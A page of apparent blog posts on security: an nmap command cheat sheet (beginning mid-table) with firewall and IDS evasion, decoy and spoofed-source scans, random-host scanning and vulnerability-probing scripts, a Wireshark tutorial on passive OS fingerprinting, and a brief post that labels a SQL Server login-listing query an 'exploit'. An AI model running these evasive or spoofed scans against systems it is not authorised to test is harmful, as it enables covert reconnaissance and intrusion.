-sM | nmap 192.168.1.1 -sM | TCP Maimon port scan

Host Discovery

Switch | Example | Description
-sL | nmap 192.168.1.1-3 -sL | No scan. List targets only
-sn | nmap 192.168.1.1/24 -sn | Disable port scanning. Host discovery only
-Pn | nmap 192.168.1.1-5 -Pn | Disable host discovery. Port scan only
-PS | nmap 192.168.1.1-5 -PS22-25,80 | TCP SYN discovery on port x. Port 80 by default
-PA | nmap 192.168.1.1-5 -PA22-25,80 | TCP ACK discovery on port x. Port 80 by default
-PU | nmap 192.168.1.1-5 -PU53 | UDP discovery on port x. Port 40125 by default
-PR | nmap 192.168.1.1-1/24 -PR | ARP discovery on local network
-n | nmap 192.168.1.1 -n | Never do DNS resolution

Port Specification

Switch | Example | Description
-p | nmap 192.168.1.1 -p 21 | Port scan for port x
-p | nmap 192.168.1.1 -p 21-100 | Port range
-p | nmap 192.168.1.1 -p U:53,T:21-25,80 | Port scan multiple TCP and UDP ports
-p- | nmap 192.168.1.1 -p- | Port scan all ports
-p | nmap 192.168.1.1 -p http,https | Port scan from service name
-F | nmap 192.168.1.1 -F | Fast port scan (100 ports)
--top-ports | nmap 192.168.1.1 --top-ports 2000 | Port scan the top x ports
-p-65535 | nmap 192.168.1.1 -p-65535 | Leaving off the initial port in a range makes the scan start at port 1
-p0- | nmap 192.168.1.1 -p0- | Leaving off the end port in a range makes the scan go through to port 65535

Service and Version Detection

Switch | Example | Description
-sV | nmap 192.168.1.1 -sV | Attempts to determine the version of the service running on each port
-sV --version-intensity | nmap 192.168.1.1 -sV --version-intensity 8 | Intensity level 0 to 9. Higher number increases possibility of correctness
-sV --version-light | nmap 192.168.1.1 -sV --version-light | Enable light mode. Lower possibility of correctness. Faster
-sV --version-all | nmap 192.168.1.1 -sV --version-all | Enable intensity level 9. Higher possibility of correctness. Slower
-A | nmap 192.168.1.1 -A | Enables OS detection, version detection, script scanning, and traceroute

OS Detection

Switch | Example | Description
-O | nmap 192.168.1.1 -O | Remote OS detection using TCP/IP stack fingerprinting
-O --osscan-limit | nmap 192.168.1.1 -O --osscan-limit | If at least one open and one closed TCP port are not found, it will not try OS detection against the host
-O --osscan-guess | nmap 192.168.1.1 -O --osscan-guess | Makes Nmap guess more aggressively
-O --max-os-tries | nmap 192.168.1.1 -O --max-os-tries 1 | Set the maximum number x of OS detection tries against a target
-A | nmap 192.168.1.1 -A | Enables OS detection, version detection, script scanning, and traceroute

Timing and Performance

Switch | Example | Description
-T0 | nmap 192.168.1.1 -T0 | Paranoid (0) Intrusion Detection System evasion
-T1 | nmap 192.168.1.1 -T1 | Sneaky (1) Intrusion Detection System evasion
-T2 | nmap 192.168.1.1 -T2 | Polite (2) slows down the scan to use less bandwidth and fewer target machine resources
-T3 | nmap 192.168.1.1 -T3 | Normal (3), the default speed
-T4 | nmap 192.168.1.1 -T4 | Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
-T5 | nmap 192.168.1.1 -T5 | Insane (5) speeds scans; assumes you are on an extraordinarily fast network

Switch | Example input | Description
--host-timeout <time> | 1s; 4m; 2h | Give up on target after this long
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time> | 1s; 4m; 2h | Specifies probe round trip time
--min-hostgroup/max-hostgroup <size> | 50; 1024 | Parallel host scan group sizes
--min-parallelism/max-parallelism <numprobes> | 10; 1 | Probe parallelization
--scan-delay/--max-scan-delay <time> | 20ms; 2s; 4m; 5h | Adjust delay between probes
--max-retries <tries> | 3 | Specify the maximum number of port scan probe retransmissions
--min-rate <number> | 100 | Send packets no slower than <number> per second
--max-rate <number> | 100 | Send packets no faster than <number> per second

NSE Scripts

Switch | Example | Description
-sC | nmap 192.168.1.1 -sC | Scan with default NSE scripts. Considered useful for discovery and safe
--script default | nmap 192.168.1.1 --script default | Scan with default NSE scripts. Considered useful for discovery and safe
--script | nmap 192.168.1.1 --script=banner | Scan with a single script. Example: banner
--script | nmap 192.168.1.1 --script=http* | Scan with a wildcard. Example: http
--script | nmap 192.168.1.1 --script=http,banner | Scan with two scripts. Example: http and banner
--script | nmap 192.168.1.1 --script "not intrusive" | Scan default, but remove intrusive scripts
--script-args | nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 | NSE script with arguments

Useful NSE Script Examples

HTTP site map generator:
nmap -Pn --script=http-sitemap-generator scanme.nmap.org

Fast search for random web servers:
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000

Brute force DNS hostnames, guessing subdomains:
nmap -Pn --script=dns-brute domain.com

Safe SMB scripts to run:
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1

Whois query:
nmap --script whois* domain.com

Detect cross-site scripting vulnerabilities:
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org

Check for SQL injections:
nmap -p80 --script http-sql-injection scanme.nmap.org

Firewall / IDS Evasion and Spoofing

Switch | Example | Description
-f | nmap 192.168.1.1 -f | Requested scan (including ping scans) uses tiny fragmented IP packets. Harder for packet filters
--mtu | nmap 192.168.1.1 --mtu 32 | Set your own offset size
-D | nmap -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1 | Send scans from spoofed IPs
-D | nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip | Above example explained
-S | nmap -S www.microsoft.com www.facebook.com | Scan Facebook from Microsoft (-e eth0 -Pn may be required)
-g | nmap -g 53 192.168.1.1 | Use given source port number
--proxies | nmap --proxies http://192.168.1.1:8080,http://192.168.1.2:8080 192.168.1.1 | Relay connections through HTTP/SOCKS4 proxies
--data-length | nmap --data-length 200 192.168.1.1 | Append random data to sent packets

Example IDS evasion command:

nmap -f -t 0 -n -Pn --data-length 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1

Output

Switch | Example | Description
-oN | nmap 192.168.1.1 -oN normal.file | Normal output to the file normal.file
-oX | nmap 192.168.1.1 -oX xml.file | XML output to the file xml.file
-oG | nmap 192.168.1.1 -oG grep.file | Grepable output to the file grep.file
-oA | nmap 192.168.1.1 -oA results | Output in the three major formats at once
-oG - | nmap 192.168.1.1 -oG - | Grepable output to screen (-oN - and -oX - also usable)
--append-output | nmap 192.168.1.1 -oN file.file --append-output | Append a scan to a previous scan file
-v | nmap 192.168.1.1 -v | Increase the verbosity level (use -vv or more for greater effect)
-d | nmap 192.168.1.1 -d | Increase debugging level (use -dd or more for greater effect)
--reason | nmap 192.168.1.1 --reason | Display the reason a port is in a particular state; same output as -vv
--open | nmap 192.168.1.1 --open | Only show open (or possibly open) ports
--packet-trace | nmap 192.168.1.1 -T4 --packet-trace | Show all packets sent and received
--iflist | nmap --iflist | Show the host interfaces and routes
--resume | nmap --resume results.file | Resume a scan

Helpful Nmap Output examples

Scan for web servers and grep to show which IPs are running web servers:
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep open

Generate a list of the IPs of live hosts:
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt

Append IPs to the list of live hosts:
nmap -iR 10 -n -oX out2.xml | grep "Nmap" | cut -d " " -f5 >> live-hosts.txt

Compare nmap output using ndiff:
ndiff scan1.xml scan2.xml

Convert nmap XML files to HTML files:
xsltproc nmap.xml -o nmap.html

Reverse sorted list of how often ports turn up:
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less

Miscellaneous Options

Switch | Example | Description
-6 | nmap -6 2607:f0d0:1002:51::4 | Enable IPv6 scanning
-h | nmap -h | nmap help screen

Other Useful Nmap Commands

Discovery only on ports x, no port scan:
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn

ARP discovery only on local network, no port scan:
nmap 192.168.1.1-1/24 -PR -sn -vv

Traceroute to random targets, no port scan:
nmap -iR 10 -sn --traceroute

Query the internal DNS for hosts, list targets only:
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1

Posted in Security

OS Fingerprinting using Wireshark

Passive OS Fingerprinting

Passive OS fingerprinting is the examination of a passively collected sample of packets from a host in order to determine its operating system platform. It is called passive because it doesn’t involve communicating with the host being examined. This technique is preferred by those on the defensive side of the fence because those individuals are typically viewing hosts from the perspective of a network intrusion detection system or a firewall. This will typically mean that there is some level of access to capture packets generated by the host in order to perform the examination of that data.

Comparing Hosts

Given a passive collection scenario, let’s examine two individual packets collected from two separate hosts.

 


Figure 1: Packet from Host A


Figure 2: Packet from Host B

Before we begin looking at the differences in these packets, let’s go ahead and see what they have in common. First, we can easily determine that both hosts are sending a TCP packet to another host. The TCP packet has only the SYN flag set, so this should be the first packet in a sequence of communication. Both hosts are sending their packets to the destination port 80, so we will assume that this is attempted communication with a web server.

Now we can start to look at a couple of things that differ between the two packets. The first thing that jumps out to most people is that Host A mentions having an invalid checksum. In this case, that is actually normal based upon the test environment the packet was captured in, so it can be ignored. Beyond that, we can discern a couple of interesting variances. Let’s step through these differences and then try to draw some conclusions about the host that sent each packet.

Time to Live

The first variance in the two packets is the Time to Live (TTL) value. We’ve discussed that the RFC documentation defines the TTL field as a means to define the maximum time a packet can remain in transit on a network until it is discarded. The RFC doesn’t define a default value, and as such, different operating systems use different default values. In this case, we can note that packet A uses a TTL of 128, and packet B uses a TTL of 64. Remember that these packets were captured directly from the transmitting source. If you were capturing these packets from the perspective of the recipient, you would see varying numbers depending on how many router hops are in between the source and destination. For instance, instead of a TTL of 128, you may see a value of 116. Generally, it’s safe to assume that if you see a number close to 128 or 64, then the default TTL was most likely one of these two.
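If you capture from the command line with tshark, Wireshark’s terminal counterpart, you can pull these fields out directly. A minimal sketch, assuming a capture file named capture.pcap:

# print source address, TTL, and total IP length for each initial SYN
tshark -r capture.pcap \
  -Y "tcp.flags.syn == 1 && tcp.flags.ack == 0" \
  -T fields -e ip.src -e ip.ttl -e ip.len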

Length

I mentioned earlier that these two packets are performing the exact same function. That might lead you to assume that they would be the exact same size, but that’s not the case. Packet A reports its length as 52 bytes, whereas packet B reports a length of 60 bytes. That means that the source host transmitting packet B added an additional 8 bytes to its SYN packet.

The source of these extra bytes can be found in the TCP header portion of the packet. The TCP header is variable length. This means that according to specification, each and every packet containing a TCP header must include a certain number of required fields, but may optionally include a few other fields if they are needed. These additional fields are referred to as TCP Options.

In packet A, there are three TCP options set. These are the Maximum Segment Size, Window Scale, and TCP SACK Permitted options. There are also a few bytes of padding that make up a total of 12 bytes of TCP options.


Figure 3: TCP Header of Packet A

In packet B, we have those same options, with the addition of the Timestamp option (which also replaces a few of the padding bytes we see in packet A).


Figure 4: TCP Header of Packet B

The timestamp option accounts for the additional 8 bytes of data in the packet sent from Host B. Both packets still perform the same function, the packet from host B just provides a bit more information about the host that created and transmitted it.

Making a Determination

Now that we’ve pointed out a few differences between the packets, we can try to determine the source operating system of each machine. In an effort to narrow things down a bit, I will go ahead and tell you that one is a Windows device and the other is a Linux device. To determine which packet belongs with which OS, you can either deploy both operating systems in a test environment and do the research yourself, or look at a chart that someone has already prepared for you.

Figure 5: A brief OS fingerprinting chart

The chart above is a very brief version of a more detailed chart put out by the SANS Institute. Based on this chart, we can determine that Host A is a Windows device, and Host B is a Linux device.

With all of that said, it’s important to mention that passive fingerprinting isn’t always an exact science. We tend to group these values into their respective operating system family (Windows, Linux, etc.), when in reality a Fedora Linux device may produce a different packet size by default than a SuSE Linux device. In addition, a lot of these values are configurable, whether by modifying a configuration file or the system registry. This means that although a Windows device may typically have a certain TCP receive window size by default, a simple registry modification could change this behavior and fool our attempts at fingerprinting the OS.

Overall, there are all sorts of weird protocol quirks and default values of particular fields that can be used to passively fingerprint a system with packets alone. With this knowledge, you should be able to do a little bit of experimentation yourself to see what variances you can find between systems.

Wrapping Up

In this article, we’ve discussed passive OS fingerprinting and gone through an example in which we compared two similar packets sent from devices using different operating systems. In the next article in this series, we will talk about active OS fingerprinting and how the responses networked devices give to certain types of packets can help us clue in on their running operating system.

Posted in Security

Sql Server exploit

There is a command in SQL Server that enables us to extract user login details from the database:

select * from sys.server_principals where type = 'U';

Possible values for Principal type:

S = SQL login

U = Windows login

G = Windows group

R = Server role

C = Login mapped to a certificate

K = Login mapped to an asymmetric key
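If you’d rather not memorize these codes, the same catalog view exposes a human-readable type_desc column; a small sketch:

-- list every server principal together with its decoded type
select name, type, type_desc from sys.server_principals order by type;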